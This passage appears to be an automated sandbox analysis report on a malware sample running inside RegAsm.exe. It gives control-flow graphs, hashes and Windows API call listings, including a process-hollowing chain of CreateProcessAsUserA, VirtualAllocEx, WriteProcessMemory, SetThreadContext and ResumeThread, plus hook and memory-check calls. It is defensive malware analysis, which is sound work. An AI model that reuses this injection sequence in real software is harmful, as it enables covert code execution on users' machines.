                                          control_flow_graph 150 2d17138-2d171c7 GetCurrentProcess 154 2d171d0-2d17204 GetCurrentThread 150->154 155 2d171c9-2d171cf 150->155 156 2d17206-2d1720c 154->156 157 2d1720d-2d17241 GetCurrentProcess 154->157 155->154 156->157 158 2d17243-2d17249 157->158 159 2d1724a-2d17265 call 2d17309 157->159 158->159 163 2d1726b-2d1729a GetCurrentThreadId 159->163 164 2d172a3-2d17305 163->164 165 2d1729c-2d172a2 163->165 165->164
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 02D171B6
                                          • GetCurrentThread.KERNEL32 ref: 02D171F3
                                          • GetCurrentProcess.KERNEL32 ref: 02D17230
                                          • GetCurrentThreadId.KERNEL32 ref: 02D17289
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136481061.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2d10000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: c613d766cda5ccf6c55d1cbb7da7d9bcf91655339ebb53636af7d205b803902d
                                          • Instruction ID: eba35467977dac5a94473f6d463938d4286ba173eaebf46f677d4cc1c47bf630
                                          • Opcode Fuzzy Hash: c613d766cda5ccf6c55d1cbb7da7d9bcf91655339ebb53636af7d205b803902d
                                          • Instruction Fuzzy Hash: 0D5155B0A002099FDB14CFAAE948BAEBBF1EF48314F20C45AE419A7760D7746D44CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02DD0040 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 358 2dd0040-2dd004f 359 2dd007b-2dd007f 358->359 360 2dd0051 358->360 361 2dd0081-2dd008b 359->361 362 2dd0093-2dd00d4 359->362 409 2dd0057 call 2dd0007 360->409 410 2dd0057 call 2dd0040 360->410 361->362 368 2dd00d6-2dd00de 362->368 369 2dd00e1-2dd00ef 362->369 363 2dd005c-2dd005e 365 2dd0074 363->365 366 2dd0060-2dd006e call 2dd02c8 363->366 365->359 366->365 375 2dd01b0-2dd0270 366->375 368->369 370 2dd00f1-2dd00f6 369->370 371 2dd0113-2dd0115 369->371 373 2dd00f8-2dd00ff 370->373 374 2dd0101 370->374 376 2dd0118-2dd011f 371->376 377 2dd0103-2dd0111 373->377 374->377 403 2dd0278-2dd02a3 GetModuleHandleW 375->403 404 2dd0272-2dd0275 375->404 378 2dd012c-2dd0133 376->378 379 2dd0121-2dd0129 376->379 377->376 382 2dd0135-2dd013d 378->382 383 2dd0140-2dd0149 378->383 379->378 382->383 386 2dd014b-2dd0153 383->386 387 2dd0156-2dd015b 383->387 386->387 388 2dd015d-2dd0164 387->388 389 2dd0179-2dd0186 387->389 388->389 391 2dd0166-2dd0176 388->391 395 2dd01a9-2dd01af 389->395 396 2dd0188-2dd01a6 389->396 391->389 396->395 405 2dd02ac-2dd02c0 403->405 406 2dd02a5-2dd02ab 403->406 404->403 406->405 409->363 410->363
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 02DD0296
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136789902.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2dd0000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 337cff574741928fcfb18f047b4ec9eece8e05ab980d72f06819a1dc16ad4b71
                                          • Instruction ID: 98fde7251e91e45d01905fecc4a62e7f375d4549b793f5d2d1a1d36c26f729bd
                                          • Opcode Fuzzy Hash: 337cff574741928fcfb18f047b4ec9eece8e05ab980d72f06819a1dc16ad4b71
                                          • Instruction Fuzzy Hash: 047122B0A00B059FDB64DF6AD44475ABBF1FF88304F108A2AD48ADBB50DB75E845CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02DDE238 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 411 2dde238-2dde253 412 2dde27d-2dde29c call 2dddb30 411->412 413 2dde255-2dde27c call 2dddb24 411->413 419 2dde29e-2dde2a1 412->419 420 2dde2a2-2dde301 412->420 427 2dde307-2dde394 GlobalMemoryStatusEx 420->427 428 2dde303-2dde306 420->428 432 2dde39d-2dde3c5 427->432 433 2dde396-2dde39c 427->433 433->432
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136789902.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2dd0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 87f23f8b341543d536259011b408526d1d199d029e4aeec60d0fc112942a43d9
                                          • Instruction ID: eb0a212c9658acde081f16d1adb0808be7d0565fe2e9da226cdbb12da457fb9d
                                          • Opcode Fuzzy Hash: 87f23f8b341543d536259011b408526d1d199d029e4aeec60d0fc112942a43d9
                                          • Instruction Fuzzy Hash: 93411372D007559FCB14DFB9D80469EBFF5AF8A220F1485AAE408A7341DB74A844CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02DD2224 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 436 2dd2224-2dd2296 438 2dd2298-2dd229e 436->438 439 2dd22a1-2dd22a8 436->439 438->439 440 2dd22aa-2dd22b0 439->440 441 2dd22b3-2dd2352 CreateWindowExW 439->441 440->441 443 2dd235b-2dd2393 441->443 444 2dd2354-2dd235a 441->444 448 2dd2395-2dd2398 443->448 449 2dd23a0 443->449 444->443 448->449 450 2dd23a1 449->450 450->450
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02DD2342
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136789902.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2dd0000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: b3403a128b94992da7dd9b4b63e64e5320e7ba3d958740e54d2b5bd4d91ff7ee
                                          • Instruction ID: 49ea7e2df8c0b9840ee2a75db3f9bac3fe30cd05af636db818bdd526e577b3e7
                                          • Opcode Fuzzy Hash: b3403a128b94992da7dd9b4b63e64e5320e7ba3d958740e54d2b5bd4d91ff7ee
                                          • Instruction Fuzzy Hash: 0C51EFB1D003499FDB14CF99C984ADEBFB5BF88310F24812AE818AB210D774A885CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02DD2230 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 451 2dd2230-2dd2296 452 2dd2298-2dd229e 451->452 453 2dd22a1-2dd22a8 451->453 452->453 454 2dd22aa-2dd22b0 453->454 455 2dd22b3-2dd2352 CreateWindowExW 453->455 454->455 457 2dd235b-2dd2393 455->457 458 2dd2354-2dd235a 455->458 462 2dd2395-2dd2398 457->462 463 2dd23a0 457->463 458->457 462->463 464 2dd23a1 463->464 464->464
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02DD2342
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136789902.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2dd0000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: 45f78fe9dd527e670bc35025a178896c045dc14d44b0336c14887a6940ae2312
                                          • Instruction ID: fe6a7c6b66a8399202c19a35d34e9830ed3bffbb9cbfbf3dbfef0da398147998
                                          • Opcode Fuzzy Hash: 45f78fe9dd527e670bc35025a178896c045dc14d44b0336c14887a6940ae2312
                                          • Instruction Fuzzy Hash: 3041CEB1D10309DFDB14CF9AC984ADEBBB5BF88310F24812AE819AB310D774A845CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02DD4990 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 465 2dd4990-2dd49cc 466 2dd4a7c-2dd4a9c 465->466 467 2dd49d2-2dd49d7 465->467 474 2dd4a9f-2dd4aac 466->474 468 2dd49d9-2dd4a10 467->468 469 2dd4a2a-2dd4a62 CallWindowProcW 467->469 475 2dd4a19-2dd4a28 468->475 476 2dd4a12-2dd4a18 468->476 470 2dd4a6b-2dd4a7a 469->470 471 2dd4a64-2dd4a6a 469->471 470->474 471->470 475->474 476->475
                                          APIs
                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 02DD4A51
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136789902.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2dd0000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CallProcWindow
                                          • String ID:
                                          • API String ID: 2714655100-0
                                          • Opcode ID: f0e78112279ff8197c5fd4a2129f4e447993b2cd617a4c7abedd3deb741adbf6
                                          • Instruction ID: 858ebfe84a504c0dc973ddf13430ee67c55d845d69ed69b5232652981eba7c5b
                                          • Opcode Fuzzy Hash: f0e78112279ff8197c5fd4a2129f4e447993b2cd617a4c7abedd3deb741adbf6
                                          • Instruction Fuzzy Hash: 8D4129B4A04705DFCB14CF99C588AAABBF5FF88318F24C499E519A7321D774A941CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02D17378 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 479 2d17378-2d1737d 480 2d17355-2d1736c 479->480 481 2d1737f-2d17414 DuplicateHandle 479->481 482 2d17416-2d1741c 481->482 483 2d1741d-2d1743a 481->483 482->483
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D17407
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136481061.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2d10000_RegAsm.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 0998db45d4425e6ae9785c6a9fb233bda1314e1837340e8e55bcff866de8bc84
                                          • Instruction ID: cb0109b2ba667d2d54e09feddce387c7e91ab448893ea3875652cd3eaac39a14
                                          • Opcode Fuzzy Hash: 0998db45d4425e6ae9785c6a9fb233bda1314e1837340e8e55bcff866de8bc84
                                          • Instruction Fuzzy Hash: C33116B5E002499FDB10CFAAE584ADEBBF5EB88320F24841AE954A3350D374A955CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02D17380 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 487 2d17380-2d17414 DuplicateHandle 488 2d17416-2d1741c 487->488 489 2d1741d-2d1743a 487->489 488->489
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D17407
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136481061.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2d10000_RegAsm.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 775e60bf292f016bd784cb26a084602847a4a6b8c3b011cc0fb3a2c401688f7f
                                          • Instruction ID: c1dcf18dcb80be8d6df04381fd92474c667f1d2428580785f9c5f38810312339
                                          • Opcode Fuzzy Hash: 775e60bf292f016bd784cb26a084602847a4a6b8c3b011cc0fb3a2c401688f7f
                                          • Instruction Fuzzy Hash: AA21C4B5D00249AFDB10CF9AD985ADEFFF4EB48324F24841AE914A7350D378A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02D11D20 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowsHookExW.USER32(010E44CC,00000000,?,?), ref: 02D122FB
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136481061.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2d10000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HookWindows
                                          • String ID:
                                          • API String ID: 2559412058-0
                                          • Opcode ID: 24cb51d7d7804643db769dbd838a8e68dd6f0b656185f5712d472023166ef2a1
                                          • Instruction ID: 5eb7e70933ffab2c4ed4359fa256efa52b73ac5e1a8fb602d6a99d78f7230b18
                                          • Opcode Fuzzy Hash: 24cb51d7d7804643db769dbd838a8e68dd6f0b656185f5712d472023166ef2a1
                                          • Instruction Fuzzy Hash: 352125B1D002199FCB14CF9AD948BEEBBF5AB88310F14841AE859A7750C775A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02D12278 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowsHookExW.USER32(010E44CC,00000000,?,?), ref: 02D122FB
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136481061.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2d10000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HookWindows
                                          • String ID:
                                          • API String ID: 2559412058-0
                                          • Opcode ID: f94cdb1af48a159bd3e62b8571bd01c391b7a3ef73861cf03770996c239159d8
                                          • Instruction ID: 56375821befdc6bcf482c79ef3e179691cd33062c5c016c531dcd07e811a6f22
                                          • Opcode Fuzzy Hash: f94cdb1af48a159bd3e62b8571bd01c391b7a3ef73861cf03770996c239159d8
                                          • Instruction Fuzzy Hash: B82157B1D002499FCB14CF99D944BEEFBF4AF88310F24842AE818A7350C774A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02DD04B1 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 02DD0522
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136789902.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2dd0000_RegAsm.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: bbe94f1bfbaf6e24d30470ecd25404a0067aa5895341e8775a00a0691a9ea44d
                                          • Instruction ID: fa2f92c56785ab845a711dc970d8d67ebe205c53dda17249b8f73ddc952eeef3
                                          • Opcode Fuzzy Hash: bbe94f1bfbaf6e24d30470ecd25404a0067aa5895341e8775a00a0691a9ea44d
                                          • Instruction Fuzzy Hash: FE1114B6D003498FCB10CF9AD444A9EFBF4EF88324F14846AE919A7300C374A945CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02DDE320 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32 ref: 02DDE387
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136789902.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2dd0000_RegAsm.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID:
                                          • API String ID: 1890195054-0
                                          • Opcode ID: 39cb1dbb47ba87e1062445b3a7a7e4ffa33fb39619641421d628d9f4fd1d9d5c
                                          • Instruction ID: bff18a231e77e851b8ecfcaf92b56869373c6b9193bc9328669b9baebd6bb89f
                                          • Opcode Fuzzy Hash: 39cb1dbb47ba87e1062445b3a7a7e4ffa33fb39619641421d628d9f4fd1d9d5c
                                          • Instruction Fuzzy Hash: 991126B1C0065A9BCB10CF9AC545BDEFBF4AF48324F14816AD418B7340D778A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02DD04B8 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 02DD0522
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136789902.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2dd0000_RegAsm.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 728c95ac86c839ce8adfa99c1e918b5f376e4808073182efe0ac2bbcf6ffca1e
                                          • Instruction ID: 365e9ab3bba49768e8daee00da7484648578a53fd90d1c06a0651f86e6729c81
                                          • Opcode Fuzzy Hash: 728c95ac86c839ce8adfa99c1e918b5f376e4808073182efe0ac2bbcf6ffca1e
                                          • Instruction Fuzzy Hash: AA1126B6D003498FCB10CF9AD444ADEFBF4EB88324F14841AD819A7300C374A544CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:15.4%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:42
                                          Total number of Limit Nodes:2
                                          execution_graph 5086 1510848 5087 151084e 5086->5087 5088 1510852 5087->5088 5090 1512211 5087->5090 5094 15163c0 5090->5094 5098 15163b3 5090->5098 5091 1512222 5091->5088 5095 15163cc 5094->5095 5096 15163d6 5095->5096 5102 151796a 5095->5102 5096->5091 5099 15163cc 5098->5099 5100 15163d6 5099->5100 5101 151796a 11 API calls 5099->5101 5100->5091 5101->5099 5103 151797a 5102->5103 5128 1518030 5103->5128 5132 1518025 5103->5132 5104 1517a1c 5111 1517d27 5104->5111 5125 15184c8 ReadProcessMemory 5104->5125 5105 1517d80 5123 1518890 ResumeThread 5105->5123 5124 1518888 ResumeThread 5105->5124 5106 1517daf 5106->5095 5107 1517b01 5126 15185b8 VirtualAllocEx 5107->5126 5108 1517b7d 5108->5111 5117 1518660 WriteProcessMemory 5108->5117 5118 1518658 WriteProcessMemory 5108->5118 5109 1517ce9 5119 1518660 WriteProcessMemory 5109->5119 5120 1518658 WriteProcessMemory 5109->5120 5110 1517bf0 5110->5109 5121 1518660 WriteProcessMemory 5110->5121 5122 1518658 WriteProcessMemory 5110->5122 5112 1517d63 5111->5112 5127 1518408 Wow64GetThreadContext 5111->5127 5112->5105 5115 15187c0 Wow64SetThreadContext 5112->5115 5116 15187c8 Wow64SetThreadContext 5112->5116 5115->5105 5116->5105 5117->5110 5118->5110 5119->5111 5120->5111 5121->5110 5122->5110 5123->5106 5124->5106 5125->5107 5126->5108 5127->5112 5129 15180c0 CreateProcessAsUserA 5128->5129 5131 151827f 5129->5131 5133 1518030 CreateProcessAsUserA 5132->5133 5135 151827f 5133->5135

                                          Executed Functions

                                          Function 01518025 Relevance: 1.7, APIs: 1, Instructions: 242processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 159 1518025-15180cc 162 1518105-1518125 159->162 163 15180ce-15180d8 159->163 168 1518127-1518131 162->168 169 151815e-151818a 162->169 163->162 164 15180da-15180dc 163->164 165 15180ff-1518102 164->165 166 15180de-15180e8 164->166 165->162 170 15180ea 166->170 171 15180ec-15180fb 166->171 168->169 172 1518133-1518135 168->172 179 15181c3-151827d CreateProcessAsUserA 169->179 180 151818c-1518196 169->180 170->171 171->171 173 15180fd 171->173 174 1518137-1518141 172->174 175 1518158-151815b 172->175 173->165 177 1518143 174->177 178 1518145-1518154 174->178 175->169 177->178 178->178 181 1518156 178->181 190 1518286-15182fa 179->190 191 151827f-1518285 179->191 180->179 182 1518198-151819a 180->182 181->175 184 15181bd-15181c0 182->184 185 151819c-15181a6 182->185 184->179 186 15181a8 185->186 187 15181aa-15181b9 185->187 186->187 187->187 189 15181bb 187->189 189->184 199 151830a-151830e 190->199 200 15182fc-1518300 190->200 191->190 202 1518310-1518314 199->202 203 151831e-1518322 199->203 200->199 201 1518302-1518305 call 1515f98 200->201 201->199 202->203 205 1518316-1518319 call 1515f98 202->205 206 1518332-1518336 203->206 207 1518324-1518328 203->207 205->203 208 1518348-151834f 206->208 209 1518338-151833e 206->209 207->206 211 151832a-151832d call 1515f98 207->211 212 1518351-1518360 208->212 213 1518366 208->213 209->208 211->206 212->213 216 1518367 213->216 216->216
                                          APIs
                                          • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0151826A
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: CreateProcessUser
                                          • String ID:
                                          • API String ID: 2217836671-0
                                          • Opcode ID: b1baf53344a6b4fd7864df4f16cacac6f85800fe24f7493b0a20dfef275c5a45
                                          • Instruction ID: 56990af1610b5a130f9a7f3072de34ab2f19780a577ab0ec3df9add7d0ec6df5
                                          • Opcode Fuzzy Hash: b1baf53344a6b4fd7864df4f16cacac6f85800fe24f7493b0a20dfef275c5a45
                                          • Instruction Fuzzy Hash: 71912871D00619CFEB26CF69CD41BDEBBB2FB48300F0485A9E818AB254DB759985CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01518030 Relevance: 1.7, APIs: 1, Instructions: 240processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 217 1518030-15180cc 219 1518105-1518125 217->219 220 15180ce-15180d8 217->220 225 1518127-1518131 219->225 226 151815e-151818a 219->226 220->219 221 15180da-15180dc 220->221 222 15180ff-1518102 221->222 223 15180de-15180e8 221->223 222->219 227 15180ea 223->227 228 15180ec-15180fb 223->228 225->226 229 1518133-1518135 225->229 236 15181c3-151827d CreateProcessAsUserA 226->236 237 151818c-1518196 226->237 227->228 228->228 230 15180fd 228->230 231 1518137-1518141 229->231 232 1518158-151815b 229->232 230->222 234 1518143 231->234 235 1518145-1518154 231->235 232->226 234->235 235->235 238 1518156 235->238 247 1518286-15182fa 236->247 248 151827f-1518285 236->248 237->236 239 1518198-151819a 237->239 238->232 241 15181bd-15181c0 239->241 242 151819c-15181a6 239->242 241->236 243 15181a8 242->243 244 15181aa-15181b9 242->244 243->244 244->244 246 15181bb 244->246 246->241 256 151830a-151830e 247->256 257 15182fc-1518300 247->257 248->247 259 1518310-1518314 256->259 260 151831e-1518322 256->260 257->256 258 1518302-1518305 call 1515f98 257->258 258->256 259->260 262 1518316-1518319 call 1515f98 259->262 263 1518332-1518336 260->263 264 1518324-1518328 260->264 262->260 265 1518348-151834f 263->265 266 1518338-151833e 263->266 264->263 268 151832a-151832d call 1515f98 264->268 269 1518351-1518360 265->269 270 1518366 265->270 266->265 268->263 269->270 273 1518367 270->273 273->273
                                          APIs
                                          • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0151826A
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: CreateProcessUser
                                          • String ID:
                                          • API String ID: 2217836671-0
                                          • Opcode ID: 0084230d968d0127186ca2e08c84a40fee7ddb54ccc5dc07ec5b70af21889837
                                          • Instruction ID: d99ef6d0e9b28b15c7cfe5b21995f22531160c0c562a09d31ee24eff68cb8af8
                                          • Opcode Fuzzy Hash: 0084230d968d0127186ca2e08c84a40fee7ddb54ccc5dc07ec5b70af21889837
                                          • Instruction Fuzzy Hash: 9F912871D00619CFEB26CF69CD41BDEBBB2FB48300F0481A9E818AB254DB759985CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01518658 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 274 1518658-15186b1 277 15186c1-15186fa WriteProcessMemory 274->277 278 15186b3-15186bf 274->278 279 1518703-1518724 277->279 280 15186fc-1518702 277->280 278->277 280->279
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 015186ED
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: d4fe61d571bd5157379556a4bab51ac71a17e51efb63a57b183de32dbc1707e8
                                          • Instruction ID: a7097730fccec5ca6cf342f97443525eeba5e365f462ec33edd2d6215330c65f
                                          • Opcode Fuzzy Hash: d4fe61d571bd5157379556a4bab51ac71a17e51efb63a57b183de32dbc1707e8
                                          • Instruction Fuzzy Hash: 2A2103B1900249DFDB10CF9AC885BDEBFF4FB48310F50842AE918A7350D379A950CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01518660 Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 282 1518660-15186b1 284 15186c1-15186fa WriteProcessMemory 282->284 285 15186b3-15186bf 282->285 286 1518703-1518724 284->286 287 15186fc-1518702 284->287 285->284 287->286
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 015186ED
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: d5b7d9374cd6c4f77b637d7cc7a8612640321e753099d26e8250e0c52f36fa64
                                          • Instruction ID: 58c46f700e9f7a8da9fc08f2db9e713cad92536f0970683f969ef1cfe6f8ce58
                                          • Opcode Fuzzy Hash: d5b7d9374cd6c4f77b637d7cc7a8612640321e753099d26e8250e0c52f36fa64
                                          • Instruction Fuzzy Hash: D021E0B5900259DFDB14CF9AC885BDEBFF4FB48310F10842AE918A7250D378A954CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 015187C0 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 289 15187c0-1518814 291 1518820-151884f Wow64SetThreadContext 289->291 292 1518816-151881e 289->292 293 1518851-1518857 291->293 294 1518858-1518879 291->294 292->291 293->294
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?), ref: 01518842
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 331b89b6e923f9418c5108b19a94c5f38851ea68b44bac7d76d52ef663eca5c3
                                          • Instruction ID: 00c7ba0b8e68a4f6d3b19f1e812b18e338331648aa057bff58e45a9d1b6b829c
                                          • Opcode Fuzzy Hash: 331b89b6e923f9418c5108b19a94c5f38851ea68b44bac7d76d52ef663eca5c3
                                          • Instruction Fuzzy Hash: E12135B1D0021A9FDB14CF9AC985BDEFBF4FB48310F14812AD518A7250D378A904CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 015187C8 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

